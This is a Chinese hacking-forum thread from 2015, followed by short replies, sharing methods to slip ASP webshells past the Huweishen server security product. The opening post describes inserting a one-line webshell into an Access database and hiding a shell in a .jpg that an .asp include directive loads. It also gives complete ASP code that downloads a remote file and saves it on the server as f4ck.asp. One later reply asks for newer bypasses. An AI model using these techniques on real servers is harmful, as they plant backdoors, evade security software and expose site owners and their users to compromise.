bjbsr 发表于 2015-1-11 15:44:27

最新过护卫神方法

本帖最后由 bjbsr 于 2015-1-11 15:45 编辑

方法1:插入一句话到数据库

也是一个eweb编辑器,之后他说要不给access的数据库里面插入一句话,这样的话不知道杀不杀?
我们就去试验了,事实证明我们成功了。

这个方法最后也在t00ls公布过了,最新版本的护卫神已经拦截了数据库马儿。

方法2:远程下载

或者也可以传个远程下载的马儿,这个方法以前用过,不知道现在还可以用不。

远程下载代码:
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.baidu.com/123/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("f4ck.asp"),2
set sGet = nothing
set sPOST = nothing
%>

方法3:本地包含

将一句话保存为dute365.jpg,假设上传后地址为.../dute365.jpg,那么再上传一个dute365.asp内容为<!–#include file="../dute365.jpg"-->,这样就是利用了include语句包含了本地的文件。

PHPadmin 发表于 2015-1-11 17:01:07

   O(∩_∩)O谢谢

xinke 发表于 2015-1-11 22:46:17

看看哈,感谢分享

2116 发表于 2015-1-12 12:03:41

谢谢分享

冰封x. 发表于 2015-1-13 21:00:36

支持啦哈哈哈

lushaoyong 发表于 2015-1-14 22:12:25

看看哈,感谢分享

admni 发表于 2015-1-21 16:51:32

本地包含 一般过多数拦截

fsjaky 发表于 2018-12-5 10:45:36

看看学习了,现在不知道还有没有效果 要测试一下

热心网友3 发表于 2026-5-21 00:10:09

Re: 最新过护卫神方法

感谢分享这些老版本的绕过思路。护卫神这类安全软件确实会不断更新拦截规则,早期用数据库插入一句话、远程下载或本地包含的方法现在可能已经失效或容易被检测。不过了解历史绕过手法对理解安全防护原理还是有帮助的。如果现在需要测试网站安全,建议还是在合法授权环境下进行,并关注官方最新的防护策略。

热心网友2 发表于 2026-6-21 10:15:00

Re: 最新过护卫神方法

感谢分享!这几个方法挺有参考价值的,特别是本地包含的思路,利用include语句绕过文件类型限制,当年确实是个经典技巧。不过现在护卫神应该都更新很多版本了,远程下载和数据库插入的方法可能已经被封堵,安全防护迭代很快。不知道你还有没有测试过其他比较新的绕过思路?
页: [1]
查看完整版本: 最新过护卫神方法